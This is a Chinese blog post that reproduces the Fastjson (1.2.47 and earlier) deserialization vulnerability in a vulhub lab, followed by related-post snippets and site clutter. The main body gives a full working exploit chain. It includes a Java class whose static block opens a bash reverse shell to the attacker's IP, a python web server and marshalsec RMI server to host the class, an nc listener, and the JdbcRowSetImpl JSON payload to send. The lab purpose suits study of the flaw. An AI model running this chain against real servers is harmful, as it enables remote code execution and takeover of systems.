fastjson反序列化漏洞复现

于 2024-05-20 12:05:24 发布
阅读量534 收藏 5
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70349048/article/details/139059760
版权

参考文章:

http://t.csdnimg.cn/12Ehl

https://www.cnblogs.com/karsa/p/15983486.html

漏洞原理:

Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。

影响 Fastjson1.2.47以及之前的版本

启动vulhub靶场

访问对应的服务

然后需要kali环境 包括java1.8版本和maven环境,详见之前的博客或者最上方文章

在/marshalsec-master/target/目录下面创建TouchFile.java文件

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

    static {

        try {

            Runtime rt = Runtime.getRuntime();

            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/反弹IP/1888 0>&1"};

            Process pc = rt.exec(commands);

            pc.waitFor();

        } catch (Exception e) {

            // do nothing

        }

    }

}

然后使用javac编译成.class文件

在TouchFile.java所在目录,使用python搭建web服务

python3 -m http.server 8001

访问kali的web服务可以看到恶意.class文件

开启RMI服务监听9999端口(将RMI服务与刚才用python搭建的网站绑定到一块)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.87.128:8001/#TouchFile" 9999

nc监听
nc -lnvp 1888

进行攻击

访问我们第一步搭建的存在fastjson反序列化漏洞的靶场,用burp suite抓包然后:

更改GET类型为POST

更改为Content-Type: application/json

往抓包里面写入poc:

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.87.128:9999/TouchFile",
        "autoCommit":true
    }
}

发送之后我们可以看到:

成功反弹shell了,至此复现结束!

就不做程序猿
关注
Fastjson反序列化漏洞复现(实战案例)
1
04-19 1万+
漏洞介绍 FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6454
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
fastjson 如何忽略@type类型解析
程序员星痕的博客
09-14 4255
最新使用Springboot redisTemplate遇到一个问题,自定义RedisSerializer中使用了fastjson进行序列化,调用JSON.toJSONString函数时添加了SerializerFeature.WriteClassName参数,导致反序列化的时候报错,,原因就是反序列化指定的类类型与序列化的时候不一致,虽然类名一样,但是全路径不一样。通常在不同的系统间进行交互,使用同一个redis集群中的资源时会出该问题。自定义AutoTypeCheckHandler,进行全局配置。
Fastjson 1.2.22-24 反序列化漏洞分析
遇事不决冲冲冲
04-29 2404
FastJson在 1.2.22 - 1.2.24 版本中存在反序列化漏洞,主要原因FastJson支持的两个特性: fastjson反序列化时,JSON字符串中的 @type 字段,用来表明指定反序列化的目标恶意对象类。 fastjson反序列化时,字符串时会自动调用恶意对象的构造方法, setter 方法, getter 方法, 若这类方法中存在利用点,即可完成漏洞利用。 主要存在两种利用方式: JdbcRowSetImpl(JNDI) TemplatesImpl(Feature.SupportNonP
Fastjson反序列化
热门推荐
Christ1na的博客
11-15 1万+
fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。fastjson是目前java语言中最快的json库,其功能完备且使用简单,因而使用非常广泛。自fastjson在1.2.24版本爆出第一次漏洞到至今,有着多次的安全补丁更新和绕过。
多次触发FastJson漏洞的AutoType机制,你了解吗?
weixin_45701550的博客
12-24 1713
解决问题的方法也很简单,既然@type指定的类型不存在,那么可以在系统中把需要的类型定义出来,不过@type指定的类型,是三方接口系统中定义的,如果把该类型引入到调用方系统中,那么对于调用方的侵入性很大,而且定义这个类型,仅仅为了解决这个问题,有很大解释成本在里面。从内容上看,比较特殊的地方在于多了一个特殊的字段“@type”,经过测试,反序列化报错,的确是因为这个特殊的字段造成的(把@type字段去掉,反序列化可以正常进行)。) fastjson。导致的,那么在序列化时,把类型信息给添加上可以了。
FastJson反序列化漏洞复现附带多个版本的payload
qq_41187177的博客
09-03 4382
FastJson<=1.2.68版本反序列化漏洞复现1.漏洞环境搭建2.攻击环境搭建3.攻击步骤4.各个Fastjson版本的payload3.漏洞解析 1.漏洞环境搭建 打开IDEA,新建一个java web的项目 修改HelloServlet.java文件输入一下代码import java.io.*; import javax.servlet.http.*; import javax.servlet.annotation.*; import com.alibaba.fastjson.*; @W
阿里巴巴开源的FastJson 1反序列化漏洞复现流程
最新发布
10-04
包含RMI服务所需的内容和测试使用的攻击FastJson1反序列化漏洞的Java文件
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3461
Fastjson 1.2.47反序列化漏洞复现
Javaweb安全——Fastjson反序列化利用
weixin_43610673的博客
10-13 4641
JSON.parseObject 的底层调用的还是 JSON.parse 方法,只是在 JSON.parse 的基础上做了一个封装。在JSON序列化时开启 SerializerFeature.WriteClassName 选项,序列化出来的结果会在开头加一个 @type 字段,值为进行序列化的类名。反序列化时带有@type 字段的序列化数据会得到对应类型的实例化对象。漏洞的还是Fastjson的功能,此功能可以反序列化的时候人为指定类,然后在利用指定的反序列化器过程中,如果满足条件则会去反射调用方法,以串联
逆向学习fastjson反序列化
Summer's blog
07-26 7574
前言 text:json文本数据 len:json文本数据长度 token:代表解析到的这一段数据的类型 ch:当前读取到的字符 bp:当前字符索引 sbuf:正在解析段的数据,char数组 sp:sbuf最后一个数据的索引 hasSpecial=false:需要初始化或者扩容sbuf 参考 http://www.b1ue.cn/archives/184.html ...
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3412
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
[Java安全]—fastjson漏洞利用
snowlyzz的博客
12-30 2333
Fastjson组件反序列化分析,从基础到RCE的过程笔记
fastjson 判断是否包含_fastjson漏洞学习分析
weixin_34551573的博客
01-11 1205
0x00前言前面写了fastjson的利用,现在补上fastjson的分析,后面附上探测后端是否使用fastjon的方法(1.2.67)。0x01fastjson基本使用toJSONString()parseObject()这两个函数一个将对象转化为json字符串,一个将json字符串反序列化成对象。image.png一般来说使用第一种方法输出json字符串,这里将第二种方法写出来,是想体现fas...
fastjson的这些坑,你误入了没?
一猿小讲
06-25 7228
背景:最近 fastjson 被爆出新的远程代码执行漏洞之后,赶紧督促项目组快马加鞭去修改(吐槽:真改不动,架不住项目既多又老),鉴于项目不同,依赖的 fastjson 版本也不同,本次...
Fastjson < 1.2.68版本反序列化漏洞分析篇
程序猿DD
10-22 2042
点击上方蓝色“程序猿DD”,选择“设为星标”回复“资源”获取独家整理的学习资料!作者 |ale_wong@云影实验室来源 |https://www.anquanke.com/post...
Fastjson 漏洞分析
systemino的博客
07-14 4750
作者:icematcha@云影实验室 0x00前言 近日,Fastjson被传爆出新的“0day”,也引起了大家的高度关注。云影实验室第一时间进行了跟进和分析,通过分析我们发现,此次的漏洞并不算新的漏洞,其实官方早在去年五月就已经推出了相关补丁修复,但可能没有发布相关的安全通告,导致许多用户没有及时升级处理,而在此次护网中就谣传变成了现在的“0day”。PHP大马 此次漏洞利用的核心...
Fastjson反序列化漏洞复现
07-22
对不起,我无法提供有关Fastjson反序列化漏洞的具体复现方法。这种漏洞是一个安全问题,使用它可能会导致系统被攻击者利用。为了保护系统的安全,建议及时升级Fastjson版本或使用其他替代方案来解决这个问题。如果您需要了解更多关于Fastjson反序列化漏洞的信息,建议您查阅相关的安全资料和公开的安全公告。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值